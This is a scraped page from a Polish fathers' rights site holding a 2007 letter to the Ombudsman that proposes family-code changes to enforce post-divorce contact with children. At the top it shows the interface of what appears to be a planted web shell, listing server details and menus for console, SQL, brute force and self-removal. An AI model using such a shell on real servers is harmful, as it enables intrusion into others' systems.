W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:12:38
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Propozycje zmian KRiO
05.11.2007.
Fundacja Akcja i Stowarzyszenie Centrum Praw Ojca i Dziecka przesłało Rzecznikowi Praw Obywatelskich opinię na temat planowanej nowelizacj KRiO i innych ustaw z nim związanych.
Nasze propozycje zmian w nowelizacji koncentrują się głównie wokół wzmocnienia roli ojca w wychowaniu dziecka przez usprawnienie egzekucji orzeczeń sądu dotyczących kontaktów z dziećmi po rozwodzie jego rodziców. Zachęcamy do zapozna nia się z naszą propozycją zmian ustawodawczych poniżej.

Jeszcze tego samego dnia otrzymaliśmy od Rzecznika odpowiedż, w której potwierdza chęć pilotowania zgłaszanych przez nas zmian ustawodawczych, oraz chęć współpracy w ramach monitorowania spraw sądowych w których naruszono prawa obywatelskie ojców walczących o opiekę nad dzieckiem.

Do Rzecznika Praw Obywatelskich Pana dr  Janusza Kochanowskiego

W imieniu Fundacji Akcja, prowadzącej portal www.wstroneojca.pl, oraz Stowarzyszenia Centrum Praw Ojca i Dziecka, reprezentujących środowisko pozamałżeńskich i rozwiedzionych ojców podejmujących starania o utrzymanie pełnych, satysfakcjonujących wychowawczo kontaktów ze swoimi dziećmi przedstawiamy Panu Rzecznikowi opinie na temat projektu ustawy:

 - o zmianie ustawy - Kodeks rodzinny i opiekuńczy oraz niektórych innych ustaw.

Obecna nowelizacja KRiO stanowi ogromną szansę na przełomowe dla polskiego prawodawstwa wzmocnienie roli pozamałżeńskich i rozwiedzionych ojców na wychowanie ich potomstwa.
W obliczu rosnącej fali rozwodów w Polsce problem rosnącego pokolenia „dzieci bez ojców” staje się coraz bardziej palący (nie chcemy w tym miejscu podkreślać, wszystkich negatywnych skutków, jakie rodzi brak uczestnictwa ojca w wychowaniu dziecka, są one przecież oczywiste).
Z dużą satysfakcją chcieliśmy podkreślić, że powyższy projekt zmian KRiO i KPC zawiera kilka istotnych zapisów, które powinny w dłuższej perspektywie pozytywnie wpłynąć na faktyczne umocnienie roli pozamałżeńskiego i rozwiedzionego ojca w wychowaniu dziecka, podkreślamy jednak, że projekt ten nie odnosi się do kluczowej dla tego problemu kwestii.
Nasze wieloletnie doświadczenie poradnicze (kilka tysięcy porad udzielonych przez naszych prawników) i inne działania na rzecz środowiska, wskazują na to, że aby rozwiedzeni ojcowie mogli liczyć na satysfakcjonujący wychowawczo kontakt ze swoimi dziećmi konieczna jest nowelizacji KRiO i innych aktów prawnych, tak aby usprawnić egzekucję sądowych orzeczeń dotyczących sposobu kontaktu z dziećmi.
Obecnie istniejące regulacje prawne jedynie w fikcyjny sposób stają w obronie prawa do kontaktów dziecka z obojgiem rodziców po ich rozstaniu. Dzieje się tak, bo nawet przyjęcie przez sąd najkorzystniejszych rozwiązań z punktu widzenia kontaktu dziecka z rodzicem, który zgodnie z orzeczeniem sądu nie sprawuje nad dzieckiem bezpośredniej pieczy, nie jest w stanie faktycznie tych kontaktów zagwarantować. Ani sąd bowiem, ani żaden inny organ, czy instytucja w Polsce nie jest w stanie wyegzekwować orzeczeń o sposobie tych kontaktów.
W tej sytuacji rodzic, który sprawuje bezpośrednią pieczę nad dzieckiem po rozwodzie staje się faktycznie jedynym dysponentem kontaktów dziecka z drugim rodzicem. Przywilej ten jest niezwykle często nadużywany i prowadzi do bezkarnego pozbawiania dziecka kontaktu z drugim rodzicem. Na ten fakt wielokrotnie zwracała prof. Wanda Stojanowska, chociażby w swojej książce „Władza rodzicielska pozamałżeńskiego i rozwiedzionego ojca”, gdzie pisze, że matki po rozwodzie stają się faktycznie wyłącznymi dysponentkami kontaktów dziecka z drugim rodzicem, a często w ogóle ze światem zewnętrznym.
Nie istnieją w polskim prawie rodzinnym żadne sankcje, które skłaniałby rodziców do przestrzegania orzeczeń sądu ustalających ich kontakty z dzieckiem. Jedyna formą nacisku na osoby, które uchylają się od respektowania tego rodzaju orzeczeń jest możliwość ukarania ich grzywną. Najczęściej jednak osoby uchylające się od respektowania orzeczeń w sprawach o kontakty nie wykazują też szczególnego entuzjazmu do poddawania się karze, jaką jest grzywna. Bez  trudu odwlekają egzekucje tej płatności na wiele miesięcy. W efekcie więc uniemożliwiania kontaktu dziecka z drugim rodzicem i łamania tym samym orzeczeń sądu rodzic sprawujący bezpośrednią pieczę nad dzieckiem w najlepszym wypadku płaci po wielu miesiącach 150 zł. albo nieco więcej, co nie jest przecież wystarczająco uciążliwą karą by w przyszłości miał podobnych wykroczeń unikać.
Temu procederowi co gorsza towarzyszy przyzwolenie społeczne, bo jeśli prawo nie wystarczająco piętnuje sprawcę tego rodzaju występków to i w opinii ludzkiej nie są one czymś groźnym. Słabe prawo, które pozbawione jest środków egzekucji norm, które ustala, demoralizuje więc tylko i prowadzi braku zaufania wymiaru sprawiedliwości w ogóle.
Ten zaklęty krąg niemożności można przerwać w naszej opinii tylko w jeden sposób – poprzez usprawnienie egzekucji prawa do kontaktu z dzieckiem, które gwarantowane są w orzeczeniach sądowych. Prawodawstwo wielu krajów przewiduje daleko idące sankcje karne za utrudnianie kontaktu z dzieckiem rodzicowi, któremu sąd przyznał do tego prawa. Do najłagodniejszych z nich należy ograniczenie prawa do opieki nad dzieckiem do najsurowszych zaś kara więzienia. Dopóki w Polsce nie doczekamy się podobnych rozwiązań, dopóty będziemy mieli do czynienia z faktyczną dyskryminacją rodziców niesprawujących bezpośredniej pieczy nad dzieckiem po rozpadzie małżeństwa, z którego dziecko to pochodzi.
Przede wszystkim jednak proponujemy wprowadzenie do Kodeksu Karnego przestępstwa „Bezzasadnego i uporczywego utrudniania kontaktu rodzicowi z dzieckiem”, za co groziłaby kara ograniczenia wolności.
Zapis ten mógłby otrzymać brzmienie:
"Kto, w sposób bezzasadny i uporczywy utrudnia kontakty dziecka z rodzicem podlega karze ograniczenia wolności."
Kara ta mogłaby być orzekana chociażby w postaci przymusowej pracy społecznej. Naszym zdaniem znacznie zmniejszyłoby to skalę opisywanego wyżej problemu.

Poza tym sugerujemy wprowadzenie do proponowanej  przez ustawodawcę nowelizacji KRiO alternatywnie następujących zmian:
Proponujemy zmianę Art. 111 § 1, nowelizacji KRiO, który otrzymałby następujące brzmienie:

Art. 111. § 1.    Jeżeli władza rodzicielska nie może być wykonywana z powodu trwałej przeszkody albo jeżeli rodzice nadużywają władzy rodzicielskiej, lub w sposób rażący zaniedbują swe obowiązki względem dziecka, albo też gdy uporczywie i bezzasadnie utrudniają oni kontakty dziecka z drugim rodzicem, sąd opiekuńczy pozbawi rodziców władzy rodzicielskiej. Pozbawienie władzy rodzicielskiej może być orzeczone także w stosunku do jednego z rodziców.
Proponujemy również wprowadzenie zmian w art. 113 nowelizacji KRiO, poprzez dodanie § 3 w następującym brzmieniu:
Art.113 § 3. Uporczywe i bezzasadne ograniczanie kontaktów dziecka z rodzicem, przez drugiego rodzica jest podstawą do ograniczenia, lub pozbawienia go, władzy rodzicielskiej.

Ograniczenie władzy rodzicielskiej w tym przypadku mogłoby przyjąć chociażby formę nadzoru kuratorskiego nad sprawowaniem opieki rodzicielskiej.
Chcemy zaznaczyć, że proponowane przez nas zapisy mają chronić dobro dziecka, a nie interes matek, czy ojców, bo chociaż to matki nagminnie utrudniają ojcom kontakty z dziećmi po rozwodzie, to ojcowie, jako rodzice, którzy mają często ograniczane kontakty z dzieckiem często dopuszczają się z kolei porwań rodzicielskich. Tak, więc proponowane przez nas zapisy w istotny sposób mogłyby ograniczyć oba procedery, co niewątpliwie służyłoby autentycznemu dobru dziecka.
Będziemy niezwykle wdzięczni za analizę naszej opinii i podjęcie inicjatywy zmierzającej do zmiany ostatecznego kształtu nowelizowanych ustaw.

Z wyrazami szacunku
Robert Kucharski
Członek Zarządu Fundacji Akcja
Tel. 064939933
Mail: Ten adres e-mail jest ukrywany przed spamerami, włącz obsługę JavaScript w przeglądarce, by go zobaczyć
Marek Borkowski
Członek Zarządu Stowarzyszenia Centrum Praw Ojca i Dziecka
Tel. 0603526677
Mail: Ten adres e-mail jest ukrywany przed spamerami, włącz obsługę JavaScript w przeglądarce, by go zobaczyć
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.